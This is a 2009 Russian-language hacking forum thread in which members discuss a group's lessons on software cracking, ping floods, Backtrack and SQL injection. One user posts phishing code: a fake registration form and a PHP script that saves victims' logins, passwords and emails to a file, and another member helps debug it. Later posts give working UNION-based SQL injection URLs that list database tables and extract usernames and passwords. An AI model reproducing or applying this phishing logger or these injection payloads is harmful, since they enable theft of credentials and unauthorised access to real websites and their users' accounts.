RE: Обсуждение уроков группы 9009
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-23 20:40:52.423333
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
ооо…..sp 3 не пробить…..:@
заметь, еще надо учитывать, что если у жертвы стоит нормальный файрволл к примеру zone alarm или outpost firewall то это еще уменьшит шансы успешного проведения атаки….[:(]
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-24 14:21:11.606666
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
quote:
ORIGINAL: S00pY
Прочитал "Урок №5. Крек. Часть 1. Взлом KeyGenMe level2.",очень интересно,но нахождение алгоритма генерации серийного кода меня смутило…. а если кода окажеться довольно много?)
В списке используемых апишек видно GetDlgItemTextA,почему бы не поставить на ней бряк и уже после ввода данных,брякнуться внутри неё….
сделать исполнение до ret, и в стэке будет наше имя….
найти его в дампе и поставить на него бряк на доступ и смотреть где оно используеться для генерации серийного кода.ИМХО это как-то понятнее для меня например:)
Да, по мне легче через буфер.. Но у каждого свои привычки…
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-24 14:24:36.843333
|
|
|
}{^O^v^e^R^}{
Сообщений: 40
Оценки: 0
Присоединился: 2009-05-01 20:01:40.870000
|
а на счет пинга с двух компов запустил 300 пингов по 65000 на комп друга, уже он и на запросы перестал отвечать, но не накрыло, как играл он кс так и играл дальше!
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-24 14:29:07.333333
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
}{^O^v^e^R^}{ у меня тоже такая ситуация……чесно сказать не знаю почему так…..
у жертвы файрволл есть ? и какой инет ? если хороший - его можно просто не забить пингом….
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-24 14:31:06.906666
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
Чео уже 7 страниц накопилось. Уже хз как с этим бороться. Наверно надо сделать ещё одно разделение этой темы.. Технические вопросы, непосредственно по урокам. И тем кому просто попиздеть охото, Имхо.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-24 14:34:23.496666
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
Neveral может по урокам по крякингу, линуксу, дос/ддос атакам сделать разные топики для вопросов ?
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-24 15:03:08.353333
|
|
|
Neveral
Сообщений: 282
Оценки: 0
Присоединился: 2009-02-10 11:51:27.530000
|
quote:
ORIGINAL: daniel_1024
Neveral может по урокам по крякингу, линуксу, дос/ддос атакам сделать разные топики для вопросов ?
Это бред, будет хз сколько топиков. Ещё хуже будет.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-24 17:03:20.430000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
daniel_1024
Neveral может по урокам по крякингу, линуксу, дос/ддос атакам сделать разные топики для вопросов ?
Это уже обсуждалось, вспомни где!
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-24 21:43:53.280000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
ORIGINAL: S00pY
Прочитал "Урок №5. Крек. Часть 1. Взлом KeyGenMe level2.",очень интересно,но нахождение алгоритма генерации серийного кода меня смутило…. а если кода окажеться довольно много?)
В списке используемых апишек видно GetDlgItemTextA,почему бы не поставить на ней бряк и уже после ввода данных,брякнуться внутри неё….
сделать исполнение до ret, и в стэке будет наше имя….
найти его в дампе и поставить на него бряк на доступ и смотреть где оно используеться для генерации серийного кода.ИМХО это как-то понятнее для меня например:)
На вкус и цвет… :)
Но кода ведь было мало? Это всего-лишь мини-туториал, посвященный взлому целевого крэкми, а не обучениям основ крэкинга)
Например я всегда сначала ставлю на lstrcmpA, и именно в этом случае это было бы быстрее и проще…
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-25 17:41:14.693333
|
|
|
}{^O^v^e^R^}{
Сообщений: 40
Оценки: 0
Присоединился: 2009-05-01 20:01:40.870000
|
quote:
ORIGINAL: daniel_1024
}{^O^v^e^R^}{ у меня тоже такая ситуация……чесно сказать не знаю почему так…..
у жертвы файрволл есть ? и какой инет ? если хороший - его можно просто не забить пингом….
quote:
Но кода ведь было мало? Это вс
нету фаера. Был бы фаер пинг вообще бы не шел! Комп жертвы в моей локалке!
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-27 16:17:00.373333
|
|
|
joined_to_your
Сообщений: 3
Оценки: 0
Присоединился: 2009-08-27 16:03:42.410000
|
Народ, помогите в создание фейка одного сайта. Что тут не правильно? Делал по первому уроку.
<table cellpadding="0" cellspacing="2" id="register-site">
<tr>
<td class="first"><strong>Логин</strong></td>
<td class="second"><input type="text" class="text" name="login" id="username" size="20" maxlength="25" value="" onchange="checkUsername(this);" title="3 - 25 символов из букв латинского алфавита и цифр. Логин не чувствителен к регистру." /></td>
<td class="third"><span style="border-bottom: 1px dotted rgb(70, 68, 65); cursor: pointer; line-height: 1.55em; color: rgb(70, 68, 65);"></span></td>
</tr>
<tr>
<td><strong>Пароль</strong></td>
<td><input type="password" class="text" name="pass" id="password" size="20" maxlength="50" value="" onchange="checkPassword( this );" /></td>
<td></td>
</tr>
<tr>
<td><strong>E-mail</strong></td>
<td><input type="text" class="text" name="email" id="email" value="" size="20" maxlength="50" value="" onchange="checkEmail( this );" /></td>
<td><span style="border-bottom: 1px dotted rgb(70, 68, 65); cursor: pointer; line-height: 1.55em; color: rgb(70, 68, 65);"></span></td>
</tr>
</table>
Запись в логе:
<?
$Login = $_POST['login'];
$Pass = $_POST['pass'];
$Email = $_POst['email']
$log = fopen("baza.php","a+");
fwrite($log,"<br> $Login:$Pass$Email \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://___.ru'></head></html>";
?>
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-27 16:20:36.493333
|
|
|
][aKER_теоретик
Сообщений: 1192
Оценки: 0
Присоединился: 2009-03-30 09:17:08.123333
|
quote:
ORIGINAL: joined_to_your
Запись в логе:
<?
$Login = $_POST['login'];
$Pass = $_POST['pass'];
$Email = $_POst['email']
$log = fopen("baza.php","a+");
fwrite($log,"<br> $Login:$Pass$Email \n");
fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://___.ru'></head></html>";
?>
Может здесь?
$Email = $_POst['email']
В строчке отсутствует ";" + название метода должно быть заглавными буквами
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-27 16:50:51.560000
|
|
|
joined_to_your
Сообщений: 3
Оценки: 0
Присоединился: 2009-08-27 16:03:42.410000
|
Спасибо, ток все равно не в это дело…
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-27 16:51:59.610000
|
|
|
][aKER_теоретик
Сообщений: 1192
Оценки: 0
Присоединился: 2009-03-30 09:17:08.123333
|
quote:
ORIGINAL: joined_to_your
Спасибо, ток все равно не в это дело…
Код ошибки в студию!
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-27 18:07:33.253333
|
|
|
joined_to_your
Сообщений: 3
Оценки: 0
Присоединился: 2009-08-27 16:03:42.410000
|
Спасибо, разобрался. Извини, что отвлек.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-27 21:54:08.260000
|
|
|
Smilegg
Сообщений: 10
Оценки: 0
Присоединился: 2009-08-06 18:05:58.400000
|
По поводу ДОС-атак: вот вы тут задаёте вопросы типа как и почему не пробивает… а вы не задумывались, для чего вам это надо? Какую цель вы преследуете?! И вообще у многих хакеров и на многих форумах дос и ддос не в почёте. Думаете просто так? Это же глупо! Ну уронили вы жертве комп 1 раз и чё?! 7 бед - один reset и будет ваше жертва приспокойно дальше сидеть в инете… а вы задолбитесь досить…. это глупо! Пользы от доса 0! (ну только если какойнить дурак за это не заплатит…) [>:] :@ :'(
Автора урока прошу не обижаццо…
Всей группе огромный респект за продолжение дела хакера9009! Приятно видеть что группа создана не зря…
ЗЫ хотелось бы увидеть более разжёванное раскрытие темы скуль инжекта… Исчо раз спасибо всем кому не насрать на новичков! :)
ЗЗЫ зря вы в этом топике писали что уроки никому не нужны… просто многие не отписываются ;)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-27 22:05:04.113333
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
урок по взлому фпт
>>
http://forum.xakep.ru/m_1507291/mpage_1/key_/tm.htm#1566097
<<
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-28 23:17:37.963333
|
|
|
SmileAndMeverik
Сообщений: 24
Оценки: 0
Присоединился: 2009-08-11 09:46:02.306666
|
Спасибо ребят за уроки, хорошо что есть такие великие учителя.. статьи очень интересные! )) Я скачиваю все ваши уроки и потом пытаюсь всё испробывать поглубже.. Только еще не всё успеваю))) у меня возник вопрос еще в уроке хакера 9009
по взлому вай фай, где описывался дистрибутив Linux - Backtrack 3.
С установкой на usb и запуском проблем не было.. Только возникла большая проблема в его освоении.. сколько не гуглил, не получается русифицировать систему. Скачал кириллицу config_ru_RU.CP1251, config_ru_RU.UTF_8, config_ru_RU.KOI8_R, а также интерфейс KDE4-BASIS.ymp а что делать с ними не знаю Кто может и кто в этом разбирается прошу не оставьте это без внимания… Заранее БОЛЬШОЕ СПАСИБО!
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-28 23:21:23.070000
|
|
|
SmileAndMeverik
Сообщений: 24
Оценки: 0
Присоединился: 2009-08-11 09:46:02.306666
|
P.S. Я бы хотел русифицировать систему для его постоянного использования :)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-29 10:34:30.333333
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
SmileAndMeverik
Спасибо ребят за уроки, хорошо что есть такие великие учителя.. статьи очень интересные! )) Я скачиваю все ваши уроки и потом пытаюсь всё испробывать поглубже.. Только еще не всё успеваю))) у меня возник вопрос еще в уроке хакера 9009
по взлому вай фай, где описывался дистрибутив Linux - Backtrack 3.
С установкой на usb и запуском проблем не было.. Только возникла большая проблема в его освоении.. сколько не гуглил, не получается русифицировать систему. Скачал кириллицу config_ru_RU.CP1251, config_ru_RU.UTF_8, config_ru_RU.KOI8_R, а также интерфейс KDE4-BASIS.ymp а что делать с ними не знаю Кто может и кто в этом разбирается прошу не оставьте это без внимания… Заранее БОЛЬШОЕ СПАСИБО!
P.S. Я бы хотел русифицировать систему для его постоянного использования
Впринцепе я мог бы сделать урок по руссефикации и настройки сети (и еще какие у вас возникают проблемы?) в Backtrack 3.
Остается лишь вопрос востребованности.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-29 14:45:50.540000
|
|
|
SmileAndMeverik
Сообщений: 24
Оценки: 0
Присоединился: 2009-08-11 09:46:02.306666
|
<<<farex>>> Буду очень признателен )) Я думаю будет многим интересны эти уроки!
Многие зарегистрировались в хакер.ру из-за уроков хакера9009,
И еще многие вступят в группу из-за массы хороших уроков, всех направлений…
Мне много пришлось гуглить, но я так и не нашёл путного ответа по русификации.. Так что буду с нетерпением ждать твоего ответа!)))
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-29 21:04:52.896666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
И еще многие вступят в группу из-за массы хороших уроков, всех направлений…
Нет уж, многих ненадо.
quote:
Мне много пришлось гуглить, но я так и не нашёл путного ответа по русификации..
http://tinyurl.com/m6rmdh Там все есть. Проверил.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-30 23:38:02.043333
|
|
|
wlan
Сообщений: 141
Оценки: 0
Присоединился: 2009-08-17 20:03:15.813333
|
>Мне много пришлось гуглить, но я так и не нашёл путного ответа по русификации..
плохо искали, http://ru.wikibooks.org/wiki/Русификация_Slackware_12#2.
http://www.linux.org.ru/wiki/en/Русификация_Slackware_12_c_utf8
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-30 23:40:11.590000
|
|
|
wlan
Сообщений: 141
Оценки: 0
Присоединился: 2009-08-17 20:03:15.813333
|
farex>урок по руссефикации и настройки сети
жжошь), имхо уроков не нада по этим темам, особенно по сети, слишком много способов выхода в сеть, а вот подсказать по моментам которые не получаются это легко =)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-30 23:43:18.246666
|
|
|
wlan
Сообщений: 141
Оценки: 0
Присоединился: 2009-08-17 20:03:15.813333
|
вот такой я не внимательный, ленива читать многабукф ) а вот это >Скачал кириллицу config_ru_RU.CP1251, config_ru_RU.UTF_8, config_ru_RU.KOI8_R, скорее сего пакеты руссификации. расширения какие нить есть? и поставьте какой нить нормальный дистрибутивчик на постоянку, багтрак имхо хорошо имена как ливсд
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-08-31 00:28:56.370000
|
|
|
PitausNervami
Сообщений: 20
Оценки: 0
Присоединился: 2008-12-15 12:17:45.460000
|
Нужны несколько индивидуальных уроков по темам которые меня интересуют. Оплата через Яндекс. Если вас заинтресовало моё предлажение стучите в асю 227212403.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-02 14:07:08.426666
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
PitausNervami индивидуальные уроки - это не к нам больше….суть нашей группы помогать новичкам, мы пишем для всех форумчан.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-04 05:09:40.823333
|
|
|
Server_ok
Сообщений: 338
Оценки: 0
Присоединился: 2009-09-03 02:46:40.450000
|
quote:
ORIGINAL: PitausNervami
Нужны несколько индивидуальных уроков по темам которые меня интересуют. Оплата через Яндекс. Если вас заинтресовало моё предлажение стучите в асю 227212403.
Стукни в аську 993367 помогу
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-04 19:44:48.086666
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Почистил. Незабываем про правила форума ;)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-15 17:06:14.090000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
up
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-17 00:29:02.500000
|
|
|
Dakota
Сообщений: 30
Оценки: 0
Присоединился: 2007-07-26 19:53:14.833333
|
большое пасиб за разжёваные уроки)
есть вопрос по уроку №2:
нарыл скуль www.bla.ru/detail.php?id=-1+union+select+1,2,3,database(),5,6,7,8
но больше чем название базы и т.п. немогу узнать, так как при попытке узнать таблицы мне выдаёт ошибку, я в тупике. что не так делаю?
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-17 06:47:49.996666
|
|
|
Mr.Vazelin4ik
Сообщений: 30
Оценки: 0
Присоединился: 2009-08-16 21:53:17.623333
|
quote:
ORIGINAL: Dakota
нарыл скуль www.bla.ru/detail.php?id=-1+union+select+1,2,3,database(),5,6,7,8
но больше чем название базы и т.п. немогу узнать, так как при попытке узнать таблицы мне выдаёт ошибку, я в тупике. что не так делаю?
Возможно не можешь подобрать таблицу ) Попробуй www.bla.ru/detail.php?id=-1+union+select+1,2,3,table_names,5,6,7,8+from_information_schema.tables+limit+1,1
eсли сработает то просмотришь таблицы. limit+2,1 limit+3,1 и т.д. для того чтоб следущие таблицы смотреть.
А так то стандартный запрос
www.bla.ru/detail.php?id=-1+union+select+1,2,3,столбец,5,6,7,8+from+таблица
Например:
www.bla.ru/detail.php?id=-1+union+select+1,2,3,username,password,6,7,8+from+users
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-17 12:26:50.866666
|
|
|
Dakota
Сообщений: 30
Оценки: 0
Присоединился: 2007-07-26 19:53:14.833333
|
quote:
ORIGINAL: Mr.Vazelin4ik
quote:
ORIGINAL: Dakota
нарыл скуль www.bla.ru/detail.php?id=-1+union+select+1,2,3,database(),5,6,7,8
но больше чем название базы и т.п. немогу узнать, так как при попытке узнать таблицы мне выдаёт ошибку, я в тупике. что не так делаю?
Возможно не можешь подобрать таблицу ) Попробуй www.bla.ru/detail.php?id=-1+union+select+1,2,3,table_names,5,6,7,8+from_information_schema.tables+limit+1,1
eсли сработает то просмотришь таблицы. limit+2,1 limit+3,1 и т.д. для того чтоб следущие таблицы смотреть.
А так то стандартный запрос
www.bla.ru/detail.php?id=-1+union+select+1,2,3,столбец,5,6,7,8+from+таблица
Например:
www.bla.ru/detail.php?id=-1+union+select+1,2,3,username,password,6,7,8+from+users
пробовал и такое, всё равно не работает выдаёт ошибку. мож какая нить фильтрация стоит?
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-17 17:22:31.136666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Dakota, а какую ошибку выдает? Проверь версию мускула. Информационная схема есть только в пятой ветке.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-17 18:43:32.360000
|
|
|
Dakota
Сообщений: 30
Оценки: 0
Присоединился: 2007-07-26 19:53:14.833333
|
quote:
ORIGINAL: horiz
Dakota, а какую ошибку выдает? Проверь версию мускула. Информационная схема есть только в пятой ветке.
Версия 5.0.54
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/htdocs/key_words_title.php on line 11
>
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-17 18:59:44.333333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
А какой запрос вернул эту ошибку?
Напиши поподробней.
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-18 08:55:00.406666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Dakota у тебя несколько ошибок в запросе, пиши так:
www.bla.ru/detail.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables+limit+1,1–+
Дополнения:
1) лучше начать не с таблиц, а с баз данных, а потом вынимать таблицы уже из нужной базы
2) не забывай, что отсчет лимита начинается от нуля (limit 0,1)
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-18 10:48:57.073333
|
|
|
Dakota
Сообщений: 30
Оценки: 0
Присоединился: 2007-07-26 19:53:14.833333
|
quote:
ORIGINAL: horiz
Dakota у тебя несколько ошибок в запросе, пиши так:
www.bla.ru/detail.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables+limit+1,1–+
Дополнения:
1) лучше начать не с таблиц, а с баз данных, а потом вынимать таблицы уже из нужной базы
2) не забывай, что отсчет лимита начинается от нуля (limit 0,1)
на счёт ошибок то я исам завтыкал, исправил.
попытался узнать какие есть базы:
www.bla.ru/detail.php?id=-1+union+select+1,2,3,schema_name,5,6,7,8+from+information_schema.schemata+LIMIT+0,1–
и снова таже самая ошибка, мож у них там вобще ничё не работает?
|
|
|
|
|
RE: Обсуждение уроков группы 9009 - 2009-09-19 16:13:06.630000
|
|
|
Алиба
Сообщений: 19
Оценки: 0
Присоединился: 2007-10-13 22:58:58.306666
|
все про взлом прочитал ! есть интересные статьи ! спс ! а может кто посмотрит этот топик !!! http://forum.xakep.ru/m_1572966/tm.htm ум0ооооляю
|
|
|
|
|
|
